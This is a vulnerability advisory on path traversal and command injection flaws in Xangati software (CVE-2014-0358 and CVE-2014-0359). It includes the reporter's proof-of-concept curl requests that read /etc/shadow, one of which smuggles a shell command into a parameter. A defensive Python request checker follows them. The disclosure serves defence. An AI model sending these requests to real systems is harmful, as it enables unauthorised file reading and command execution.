Overview
Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.
Description
Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.
CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'
CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'
The CVSS score below is for CVE-2014-0359.
Impact
A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.
Solution
Apply an Update
Upgrade to XSR11 or XNR 7 for the appropriate product.
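A request-body check for the two patterns shown in the proof-of-concept requests above, as an added example (not part of the original advisory and not Xangati's code): it flags `..` segments in the `file`, `download` and `binfile` parameters and shell metacharacters in `params`. The function names and the sample bodies are constructed for illustration.

```python
from urllib.parse import unquote, unquote_plus

# Parameters that carry a file path in the advisory's requests.
PATH_PARAMS = {"file", "download", "binfile"}
# Parameter handed to a script in the advisory's command-injection request.
CMD_PARAMS = {"params"}
# Characters a shell treats as separators, substitutions or redirections.
SHELL_META = set(";|&`$<>\n")


def decode_fully(value, rounds=3):
    """Form-decode once, then keep URL-decoding so %252e%252e is seen as '..'."""
    value = unquote_plus(value)
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_body(body):
    """Return (parameter, finding) tuples for one form-encoded request body."""
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        segments = value.replace("\\", "/").split("/")
        if name in PATH_PARAMS and ".." in segments:
            findings.append((name, "path traversal"))
        if name in CMD_PARAMS and SHELL_META & set(value):
            findings.append((name, "shell metacharacter"))
    return findings


# Constructed sample bodies, shaped like the requests in this advisory.
SAMPLES = [
    "key=k&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2Fstatus.txt",
    "key=k&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../etc/hostname",
    "key=k&request=download&download=%2Ffloodguard%2Fdata%2F%252e%252e%2F%252e%252e%2Fx",
    "key=k&falconConfig=validateTest&params=gui_input_test.pl&params=-p+localhost",
    "key=k&falconConfig=validateTest&params=gui_input_test.pl&params=-p+localhost%3Becho+x",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body)
```

The same check can run over captured POST bodies for `/servlet/MGConfigData` and `/servlet/Installer` on appliances that have not yet been upgraded.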
Vendor Information
Vendor | Status | Date Notified | Date Updated
---|---|---|---
Xangati Inc | Affected | 23 Jan 2014 | 11 Apr 2014
If you are a vendor and your product is affected, let us know.
CVSS Metrics
Group | Score | Vector
---|---|---
Base | 9.4 | AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal | 8.2 | E:ND/RL:OF/RC:C
Environmental | 2.1 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND
References
https://cwe.mitre.org/data/definitions/78.html
https://cwe.mitre.org/data/definitions/23.html
http://xangati.com/products/
Credit
Thanks to Jan Kadijk for reporting this vulnerability.
This document was written by Jared Allar.
Other Information
CVE IDs: CVE-2014-0358 CVE-2014-0359
Date Public: 14 Apr 2014
Date First Published: 14 Apr 2014
Date Last Updated: 14 Apr 2014
Document Revision: 11
Feedback
If you have feedback, comments, or additional information about this vulnerability, please send us email.